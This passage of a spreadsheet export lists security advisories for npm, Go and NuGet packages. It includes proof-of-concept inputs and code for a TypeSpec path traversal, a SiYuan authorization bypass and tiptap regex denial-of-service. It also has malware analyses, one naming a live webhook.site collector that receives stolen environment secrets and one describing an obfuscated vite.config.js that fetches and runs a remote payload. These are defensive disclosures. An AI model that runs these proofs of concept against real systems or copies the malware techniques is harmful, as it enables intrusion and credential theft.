`resolvePath()` joins the template to `emitterOutputDir` before `{version}` is interpolated, so it does not see the attacker-controlled `..` components.

### Proof of concept

The relevant input in `poc/main.tsp` is:

```tsp
@versioned(Versions) namespace Svc;
enum Versions { v1: "../../../../../../../../../../tmp/TYPESPEC_PWNED/pwn" }
```

Run from PowerShell:

```powershell
cd poc
.\run-revalidation.ps1
```

The supplied Docker runner uses a digest-pinned Node base, a committed npm integrity lock, disabled runtime networking, a benign control, a 90-second timeout, and cleanup enforcement.

Observed in the preserved identity-locked replay (`1/1` attack and `1/1` negative control):

```text
negative_before=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
negative_after=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
attack_before=7a8067bc04e42a025de90fd7aff9be4df59f005d192f2116eecfb107d7bffd78
attack_after=2992b399c1573c9bd2130794f8554c4026bf425861f74e78b5d89ae0324b5e38
outside_file_head=openapi: 3.0.0
inside_attack_files=
```

The benign version preserved the outside canary. The crafted version replaced it with emitted OpenAPI content, and no attack output file remained under `tsp-output`.

### Impact and constraints

Proven impact is out-of-directory YAML/JSON creation or overwrite. The attacker can influence the traversal, final basename, and many strings in the OpenAPI-structured content. The extension is constrained to the selected emitter format, content is not arbitrary bytes, and the target must be writable.

This report demonstrates file corruption. Denial of service is a potential impact when a writable critical file is targeted. It does not claim file disclosure, arbitrary-byte write, deployment takeover, or code execution by a downstream consumer.

### Suggested remediation

After every filename token has been interpolated, resolve the completed destination against `emitterOutputDir` and reject any non-descendant using path-component-aware comparison. Reject or slugify absolute paths, path separators, and traversal components in spec-derived filename tokens. Add regression cases for POSIX and Windows separators, absolute values, sibling-prefix paths, and benign semantic versions.</t></is></c><c r="T1657" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="1658"><c r="A1658" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1658" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D1658" s="5" t="inlineStr" /><c r="E1658" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1658" s="5" t="inlineStr" /><c r="H1658" s="5" t="inlineStr" /><c r="I1658" s="5" t="inlineStr" /><c r="J1658" s="5" t="inlineStr" /><c r="K1658" s="5" t="inlineStr" /><c r="L1658" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1658" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1658" s="5" t="inlineStr" /><c r="R1658" s="5" t="inlineStr" /><c r="S1658" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="T1658" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="1659"><c r="A1659" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1659" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D1659" s="5" t="inlineStr" /><c r="E1659" s="5" t="inlineStr" /><c r="F1659" s="5" t="inlineStr" /><c r="G1659" s="5" t="inlineStr" /><c r="H1659" s="5" t="inlineStr" /><c r="I1659" s="5" t="inlineStr" /><c r="J1659" s="5" t="inlineStr" /><c r="K1659" s="5" t="inlineStr" /><c r="L1659" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M1659" s="5" t="inlineStr" /><c r="N1659" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1659" s="5" t="inlineStr" /><c r="R1659" s="5" t="inlineStr" /><c r="S1659" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: ghsa-malware (37d8dfb4ceaec110414441ebad5da37dad342ef653a20499504385d9db1ffdac)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59" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="1660"><c r="A1660" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1660" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D1660" s="5" t="inlineStr" /><c r="E1660" s="5" t="inlineStr" /><c r="F1660" s="5" t="inlineStr" /><c r="G1660" s="5" t="inlineStr" /><c r="H1660" s="5" t="inlineStr" /><c r="I1660" s="5" t="inlineStr" /><c r="J1660" s="5" t="inlineStr" /><c r="K1660" s="5" t="inlineStr" /><c r="L1660" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M1660" s="5" t="inlineStr" /><c r="N1660" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1660" s="5" t="inlineStr" /><c r="R1660" s="5" t="inlineStr" /><c r="S1660" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3a74ab9e45d4f67b40e21dc7491aff1979b4bf79be24bc49b8588916c18b847f)
package.json declares a preinstall script (preinstall.js) that runs automatically on `npm install`. The script collects os.hostname(), os.userInfo(), homedir, internal IP addresses, CI/repository identifiers (GITHUB_REPOSITORY, CI_PROJECT_PATH, JENKINS_URL, etc.), parent package.json metadata, and enumerates process.env keys matching /(TOKEN|KEY|SECRET|PASS|AUTH|CRED|AWS|AZURE|GCP|NPM|GITHUB|GITLAB|API)/i, then POSTs the payload to a hardcoded anonymous collector at https://webhook.site/5ba4d4a7-b977-4bb8-b26e-517b46271316. Bulk env-name enumeration and internal-network / CI-identifier collection are outside any documented purpose of a React Native auth library and disclose to a remote party which credentials exist on the installer or CI runner and how the host is situated. The manifest additionally lists the package's own name (krdpass-auth-react-native ^1.6.0) as one of its dependencies, causing npm to resolve and execute the lifecycle hooks of future self-published versions during install.

## Source: ghsa-malware (802615c8d05ade7426df3338956dc9f1e50c4bfdbb4890b873a978859fa2a537)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0" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="1661"><c r="A1661" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1661" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D1661" s="5" t="inlineStr" /><c r="E1661" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1661" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1661" s="5" t="inlineStr" /><c r="H1661" s="5" t="inlineStr" /><c r="I1661" s="5" t="inlineStr" /><c r="J1661" s="5" t="inlineStr" /><c r="K1661" s="5" t="inlineStr" /><c r="L1661" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1661" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1661" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1661" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1661" s="5" t="inlineStr" /><c r="R1661" s="5" t="inlineStr" /><c r="S1661" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-63gh-g2x5-x69v. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1661" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="1662"><c r="A1662" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1662" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D1662" s="5" t="inlineStr" /><c r="E1662" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1662" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1662" s="5" t="inlineStr" /><c r="H1662" s="5" t="inlineStr" /><c r="I1662" s="5" t="inlineStr" /><c r="J1662" s="5" t="inlineStr" /><c r="K1662" s="5" t="inlineStr" /><c r="L1662" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1662" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N1662" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1662" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1662" s="5" t="inlineStr" /><c r="R1662" s="5" t="inlineStr" /><c r="S1662" s="5" t="inlineStr"><is><t>### Scope note (please read first)

This endpoint does not exist in v3.7.3 or on master. It was introduced on the development branch by commit `acfc02ee8` ("Improve database field visibility across views", #11020) and is live on `v3.7.4-alpha.1`, so it will ship in v3.7.4 unless gated first. No released stable version is affected.

### Summary

`/api/av/getAttributeViewFieldViews` is registered with `CheckAuth` only and applies no publish-access filtering. Given a database `avID`, it returns the complete view structure of that database: every view's name, icon, layout type and the per-field `Hidden` flag, regardless of whether the caller is authorized to see that database or those views.

The route registered immediately before it, `getAttributeViewKeys`, does gate reader roles.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:530` `POST /api/av/getAttributeViewFieldViews` → `model.CheckAuth` → `getAttributeViewFieldViews` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. Greps for `IsReadOnlyRoleContext`, `publishAccess` and `Filter*` all return zero matches |
| Exposed | For each entry in `attrView.Views`: `ID`, `Icon`, `Name`, `Type`, and the `Hidden` flag for the requested field |
| Introduced by | `acfc02ee8` (feature), dev branch only |

**The leak path.** The handler binds `avID` and `keyID`, validating them against the ID pattern only, then calls `GetAttributeViewFieldViews(avID, keyID)`. That function calls `av.ParseAttributeView(avID)`, which reads the database's storage file directly by identifier. There is no ownership check and no publish-access check anywhere on the path. The result is a per-view record for every view the database defines.

What a reader learns is author-written: view names are typed by the user, and layout type distinguishes a table from a gallery or kanban. The `Hidden` flag additionally reveals, per view, which fields the author chose to conceal.

**Guarded sibling, one route earlier.** `getAttributeViewKeys` (`kernel/api/router.go:529`) is also reader-reachable and does gate:

```go
if model.IsReadOnlyRoleContext(c) {
    blockAttributeViewKeys = model.FilterBlockAttributeViewKeysByPublishAccess(c, publishAccess, ...)
}
```

The new route at 530 applies nothing equivalent.

This is worth flagging as more than an isolated omission. `acfc02ee8` added a new reader-reachable attribute-view endpoint during the same development cycle in which the surrounding attribute-view endpoints were being hardened. The same pattern produced an earlier exposure: `f2d966659`, which added encrypted-notebook unlock status for plugin consumption, created a reader-reachable disclosure on a surface that was otherwise being tightened. A check on new reader-reachable routes against the gating applied to their registered neighbours would catch this class before release.

**Reachability, stated honestly.** The endpoint requires a valid `avID` and `keyID`. `renderAttributeView` supplies both to a reader for any database embedded in a document the reader can access. The realistic target is therefore a partially-published database: the document publishes one view, and this endpoint enumerates the existence, name, layout type and hidden-field configuration of the database's other views, including views the author did not publish. Against a database with no reader-accessible surface at all, obtaining the identifiers is harder, particularly since the `getAttributeViewKeysByID` enumeration path was closed on the development branch. The severity below reflects that constraint rather than a worst case.

### Proof of Concept

Precondition: `v3.7.4-alpha.1` build, publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A database embedded in a reader-accessible document, with at least one additional view that is not published.

Step 1, obtain the identifiers through the reader-accessible path:

```
POST http://127.0.0.1:6808/api/av/renderAttributeView
{"id":"&lt;block id of the embedded database in a published doc&gt;"}

→ 200, returns the published view together with its key identifiers
```

Step 2, enumerate the rest of the database's views:

```
POST http://127.0.0.1:6808/api/av/getAttributeViewFieldViews
{"avID":"&lt;avID from step 1&gt;","keyID":"&lt;keyID from step 1&gt;"}

→ 200, returns a record per view: ID, Icon, Name, Type, Hidden
```

The response includes views that were never published, disclosing their author-written names, their layout types, and which field is hidden in each.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can enumerate the full view structure of a database when only part of that database is published. View names are author-written free text and frequently describe the data they filter, so this discloses the existence and subject matter of unpublished views. The per-field `Hidden` flags additionally reveal the author's concealment choices across those views. Confidentiality only, with no integrity or availability impact, and bounded by the reader needing identifiers obtainable from a reader-accessible database.

### Suggested fix

Gate the handler for read-only roles, mirroring `getAttributeViewKeys`: when `IsReadOnlyRoleContext(c)` holds, resolve the block that owns the `avID` and apply the publish-access check before returning any view record, or filter the returned set through the same `FilterBlockAttributeViewKeysByPublishAccess` path its neighbour uses.</t></is></c><c r="T1662" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="1663"><c r="A1663" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1663" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D1663" s="5" t="inlineStr" /><c r="E1663" s="5" t="inlineStr" /><c r="F1663" s="5" t="inlineStr" /><c r="G1663" s="5" t="inlineStr" /><c r="H1663" s="5" t="inlineStr" /><c r="I1663" s="5" t="inlineStr" /><c r="J1663" s="5" t="inlineStr" /><c r="K1663" s="5" t="inlineStr" /><c r="L1663" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M1663" s="5" t="inlineStr" /><c r="N1663" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1663" s="5" t="inlineStr" /><c r="R1663" s="5" t="inlineStr" /><c r="S1663" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3174ac7cecbc1869ae5ac87ea585de744f6b7d17b8c089b746384c2b7e2355a3)
This template package ships files/vite.config.js which, after a benign Vite header, appends ~26KB of heavily obfuscated code (obfuscator.io-style string-array with rotation dispatcher, hex payloads XOR-decoded at runtime with key 0xA2, arithmetic-hidden numeric literals). When the scaffolded project is run via `vite` / `npm run dev`, the config executes a `run()` routine that queries Ethereum JSON-RPC endpoints (`eth_getBlockByNumber`, `eth_getTransactionCount`) against a hardcoded sender address to resolve a command-and-control IP hidden in on-chain transaction data, fetches an XOR-encrypted payload over HTTP, decrypts it, and passes it to both `eval(...)` and `spawn('node', ['-e', payload], {detached: true, stdio: 'ignore', windowsHide: true})`, yielding a hidden detached Node process on the developer's machine. The package's declared `main` (dist/index.js) is inert, so scanners inspecting only the entry point miss the payload; the obfuscation and EtherHiding indirection exist solely to conceal the remote-execution chain from static review. Execution fires the first time a developer runs the scaffolded project generated from this template, giving full RCE on the developer's host.

## Source: ghsa-malware (9cb614be24802762692ee3d58173981e3c20bdebe4fabd6846ab71671568d4ca)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3" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="1664"><c r="A1664" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1664" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D1664" s="5" t="inlineStr" /><c r="E1664" s="5" t="inlineStr" /><c r="F1664" s="5" t="inlineStr" /><c r="G1664" s="5" t="inlineStr" /><c r="H1664" s="5" t="inlineStr" /><c r="I1664" s="5" t="inlineStr" /><c r="J1664" s="5" t="inlineStr" /><c r="K1664" s="5" t="inlineStr" /><c r="L1664" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M1664" s="5" t="inlineStr" /><c r="N1664" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1664" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1664" s="5" t="inlineStr" /><c r="R1664" s="5" t="inlineStr" /><c r="S1664" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (558344f06c374c5eff9c870250d63a5e9f784ffe23f91182154d9c66c441ee0b)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (4708373dfb7211317f4ebae7bd11027043840e6db7a9f2d9aa3385611a2fdad8)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4" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="1665"><c r="A1665" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1665" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D1665" s="5" t="inlineStr" /><c r="E1665" s="5" t="inlineStr" /><c r="F1665" s="5" t="inlineStr" /><c r="G1665" s="5" t="inlineStr" /><c r="H1665" s="5" t="inlineStr" /><c r="I1665" s="5" t="inlineStr" /><c r="J1665" s="5" t="inlineStr" /><c r="K1665" s="5" t="inlineStr" /><c r="L1665" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M1665" s="5" t="inlineStr" /><c r="N1665" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1665" s="5" t="inlineStr" /><c r="R1665" s="5" t="inlineStr" /><c r="S1665" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ad4c3329ebb2fdeb3b9ddc93abcb5f3dab6773f7a7999ff96d063d49edc04d9)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (23d279de5770039164036b3717fa8188b73601e773d8647f1a4e1b6ac59c5a17)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1665" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="1666"><c r="A1666" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1666" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D1666" s="5" t="inlineStr" /><c r="E1666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1666" s="5" t="inlineStr" /><c r="H1666" s="5" t="inlineStr" /><c r="I1666" s="5" t="inlineStr" /><c r="J1666" s="5" t="inlineStr" /><c r="K1666" s="5" t="inlineStr" /><c r="L1666" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M1666" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N1666" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1666" s="5" t="inlineStr" /><c r="R1666" s="5" t="inlineStr" /><c r="S1666" s="5" t="inlineStr"><is><t>## Summary

`@tiptap/core` contains two quadratic regular-expression denial-of-service paths in its default Markdown attribute parsers. Pandoc-style block attributes use two unanchored greedy expressions that rescan repeated `__QUOTED_0` prefixes. Inline shortcode attributes use another unanchored greedy key expression that rescans a long word-character run when no equals sign follows.

The public `createAtomBlockMarkdownSpec` and `createBlockMarkdownSpec` helpers call the vulnerable Pandoc-style parser; `createInlineMarkdownSpec` calls the separately vulnerable shortcode parser. Using unmodified npm 3.29.2, a complete 20,508-byte atom-block token took approximately 1.40 seconds while an equal-length control took 0.29 ms. A complete 32,776-byte inline token took approximately 2.21 seconds while its equal-length control took 0.19 ms. Current repository `main` commit `5158212970344952dd9918b6a44bfb400d7fb6c1` retains both expressions.

## Block attribute root cause

`packages/core/src/utilities/markdown/attributeUtils.ts` uses both `matchAll` and `replace` with `/([a-zA-Z][\w-]*)\s*=\s*(__QUOTED_\d+__)/g`. The candidate is `'__QUOTED_0'.repeat(n) + '__QUOTED_0__'`. There are no quotes, so the preceding replacement leaves it unchanged. At each `Q`, the greedy key-name expression consumes the remaining word-character run, the required equals sign fails, and the unanchored engine restarts at the next `Q`. This yields `O(n^2)` work, and the cleanup pass repeats it.

A complete public-API proof is:

```js
import { createAtomBlockMarkdownSpec } from '@tiptap/core'
const tokenizer = createAtomBlockMarkdownSpec({ nodeName: 'probe' }).markdownTokenizer
const attack = '__QUOTED_0'.repeat(2048) + '__QUOTED_0__'
const source = `:::probe {${attack}} :::\n`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

Measured complete-tokenizer timings were 6.23, 23.12, 88.93, 369.10, and 1,400.17 ms at 1,308, 2,588, 5,148, 10,268, and 20,508 bytes. Equal-length controls took 0.07 to 0.29 ms. The directly exported parser took 5,645.71 ms at 40,972 bytes while its control took 0.64 ms.

## Inline attribute root cause

`packages/core/src/utilities/markdown/createInlineMarkdownSpec.ts` uses `/(\w+)=(?:"([^"]*)"|'([^']*)')/g`. For a long word-character run without an equals sign, `\w+` consumes the remaining suffix, `=` fails, and the unanchored engine restarts at the next character. The default inline tokenizer extracts this attacker string directly from a syntactically complete `[shortcode attributes]` token.

```js
import { createInlineMarkdownSpec } from '@tiptap/core'
const tokenizer = createInlineMarkdownSpec({ nodeName: 'probe', selfClosing: true }).markdownTokenizer
const source = `[probe ${'0'.repeat(32768)}]`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

At 1,032, 2,056, 4,104, 8,200, 16,392, and 32,776 bytes, candidates took 3.24, 12.88, 54.82, 136.91, 557.83, and 2,209.47 ms. Equal-length hyphen controls took 0.02 to 0.19 ms.

## Impact

Applications parsing attacker-controlled Markdown with these helpers can have a browser main thread, server event loop, or worker blocked by a small input. Persisted documents can repeatedly freeze clients; repeated requests can exhaust server-side parsing capacity. Editors that only consume validated ProseMirror JSON and never invoke the Markdown parsing path are not directly affected through document content.

## History and remediation

Commit `35645d94ae9cd73448a564104c2e08f64e9564bc` introduced both parsers on 14 October 2025, first released in 3.7.0. Versions 3.7.0 through current 3.29.2 and current `main` remain affected. Official issue, PR, and repository-advisory searches found no duplicate.

Require a start-of-string or whitespace boundary before both key-value parsers, and preferably replace the multi-pass placeholder and shortcode regex designs with deterministic single-pass tokenizers. Keep quoted values out-of-band so attacker input cannot collide with predictable `__QUOTED_n__` placeholders. Add complete block and inline Markdown-tokenizer scaling regressions with equal-length controls.

Please credit GitHub user `joostgrunwald` as finder/reporter.</t></is></c><c r="T1666" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t></is></c></row><row r="1667"><c r="A1667" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1667" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D1667" s="5" t="inlineStr" /><c r="E1667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1667" s="5" t="inlineStr" /><c r="H1667" s="5" t="inlineStr" /><c r="I1667" s="5" t="inlineStr" /><c r="J1667" s="5" t="inlineStr" /><c r="K1667" s="5" t="inlineStr" /><c r="L1667" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1667" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1667" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1667" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1667" s="5" t="inlineStr" /><c r="R1667" s="5" t="inlineStr" /><c r="S1667" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-527h-q9f6-p7qx. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in .NET and Visual Studio allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T1667" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="1668"><c r="A1668" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1668" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D1668" s="5" t="inlineStr" /><c r="E1668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1668" s="5" t="inlineStr" /><c r="H1668" s="5" t="inlineStr" /><c r="I1668" s="5" t="inlineStr" /><c r="J1668" s="5" t="inlineStr" /><c r="K1668" s="5" t="inlineStr" /><c r="L1668" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1668" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1668" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1668" s="5" t="inlineStr" /><c r="R1668" s="5" t="inlineStr" /><c r="S1668" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2j8r-3c22-8565. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1668" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="1669"><c r="A1669" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1669" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D1669" s="5" t="inlineStr" /><c r="E1669" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1669" s="5" t="inlineStr" /><c r="H1669" s="5" t="inlineStr" /><c r="I1669" s="5" t="inlineStr" /><c r="J1669" s="5" t="inlineStr" /><c r="K1669" s="5" t="inlineStr" /><c r="L1669" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M1669" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N1669" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1669" s="5" t="inlineStr" /><c r="R1669" s="5" t="inlineStr" /><c r="S1669" s="5" t="inlineStr"><is><t>### Impact
A number of vulnerabilities, two rated as "Critical" severity using CVSSv3, have been discovered and fixed in the upstream libheif dependency. These can lead to possible remote code execution (RCE) on glibc-based Linux when run under certain conditions.

The attack vector for these claims to be "network" however sharp does not provide any networking features so this vulnerability is down-rated to a "High" severity using CVSSv4 but please note its Subsequent System Impact.

Those processing untrusted input with versions of sharp prior to 0.35.4 are affected.

### Patches

#### Using prebuilt binaries provided by sharp?

Most people rely on the prebuilt binaries provided by sharp.

Please upgrade sharp to the latest version, currently 0.35.4, which provides libheif 1.23.2.

#### Using a globally-installed libheif?

Please ensure you are using the latest libheif 1.23.2.

### Workarounds
Add the following to your code to prevent sharp from decoding AVIF images.
```js
sharp.block({ operation: ["VipsForeignLoadHeif"] });
```

Ensure you are using a `node` executable binary compiled as a Position Independent Executable (PIE). Most Linux package managers already do this for protection against RCE however be warned that the "official" Node.js binaries do not.

### References
- [CVE-2026-84383](https://github.com/strukturag/libheif/security/advisories/GHSA-g89c-p67h-r497)
